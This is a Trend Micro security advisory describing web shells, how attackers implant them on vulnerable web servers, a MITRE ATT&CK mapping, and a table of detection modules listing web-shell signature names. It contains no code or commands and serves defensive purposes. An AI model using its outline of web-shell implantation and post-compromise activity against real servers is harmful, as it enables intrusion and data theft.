Sign In with your
Trend Micro Account
Need Help?
Need More Help?

Create a technical support case if you need further support.

Web shell proliferates as web server's vulnerabilities increase

    • Updated:
    • 18 Dec 2020
    • Product/Version:
    • Apex One 2019
    • Deep Discovery Email Inspector All
    • Deep Discovery Inspector All
    • Deep Security 12.0
    • OfficeScan XG
    • ScanMail for Exchange 14.0
    • Worry-Free Business Security Standard 10.0
    • Platform:
Summary

A web shell is a piece of malicious code, often written in typical web development programming languages such as ASP, PHP and JSP, that attackers implant on web servers to provide remote access and code execution to server functions.

To implant web shells, attackers take advantage of security gaps in Internet-facing web servers, typically vulnerabilities in web applications, for example CVE-2019-0604 or CVE-2019-16759. An attacker can identify vulnerabilities that can be exploited by using network reconnaissance tools to be able to install web shell. Once successfully uploaded, the attacker can use the web shell to leverage other exploitation techniques to escalate privileges and issue commands remotely. The commands include the ability to add, delete and execute files as well as the ability to run shell commands, executables or scripts.

The web shells provide the following capabilities after successful installation by attacker:

  • Allow attackers to execute commands and steal data from a web server
  • Use server as launch pad for further attacks against the affected organization
  • Issue commands to hosts inside network without direct Internet access
  • Upload additional malware such as Chopper for watering hole attacks and scanning of other victims

Capabilities

  • Information Theft
  • Backdoor commands
  • Exploits

Impact

  • Compromise system security - with backdoor capabilities that can execute malicious commands
  • Violation of user privacy - gathers user credentials and steals user information

Additional Threat Reference Information

Infection Chain

cid:image002.jpg@01D5E6AA.BFB9C7B0

MITRE ATT&CK Matrix

BEHAVIORTACTICTECHNIQUE
Attackers take advantage of security gaps in Internet-facing web serversInitial AccessT1190: Exploit Public-Facing Application
Allow attackers to execute commands from a web serverExecutionT1035: Service Execution
Attackers install web shell on misconfigured Internet-facing webserverPersistence, Privilege EscalationT1100: Web Shell
Compromised accounts are accessedCredential AccessT1110: Brute Force
Attacker can identify vulnerabilities that can be exploited by using network reconnaissance toolsDiscoveryT1087: Account Discovery
T1135: Network Share Discovery
T1121: Password Policy Discovery
T1069: Permission Groups Discovery
Web shell commands include the ability to add, delete and execute files as well as the ability to run shell commands, executables or scriptsLateral MovementT1077: Windows Admin Shares
Harvests sensitive data and credentialsCollectionT1119: Automated Collection
Gathered information is sent to C&C server of attackerExfiltrationT1071: Exfiltration Over Command and Control Channel
Details
Public

Available Solutions

Solution ModulesSolution AvailablePattern BranchRelease DateDetection/Policy/Rules
Email ProtectionN/A---
URL ProtectionYesIn the Cloud--
Advanced Threat Scan Engine (ATSE)Yes15.675.00February 9, 2020-
Predictive Machine LearningNo---
File detection (VSAPI)YesENT OPR 15.678.00February 11, 2020Backdoor.PHP.WEBSHELL.SMMR
Backdoor.ASP.WEBSHELL.KEQM
Backdoor.BAT.WEBSHELL.A
Backdoor.Perl.WEBSHELL.AD
Backdoor.PS1.WEBSHELL.A
Backdoor.VBS.WEBSHELL.AH
Backdoor.Win32.WEBSHELL.EQWK
HackTool.PHP.WEBSHELL.AC
Trojan.JS.WEBSHELL.AA
Trojan.PHP.WEBSHELL.SBJKSA
Network PatternYesNCIP 1.14037.00January 24, 2020KindEditor Possible WebShell File Upload Exploit - HTTP (Request)
Behavioral Monitoring (AEGIS)No---
Premium
Internal
Partner
Rating:
Category:
Remove a Malware / Virus
Solution Id:
000283514
Feedback
Did this article help you?

Thank you for your feedback!


*This form is automated system. General questions, technical, sales, and product-related issues submitted through this form will not be answered.

If you need additional help, you may try to contact the support team. Contact Support

To help us improve the quality of this article, please leave your email here so we can clarify further your feedback, if neccessary:
We will not send you spam or share your email address.

*This form is automated system. General questions, technical, sales, and product-related issues submitted through this form will not be answered.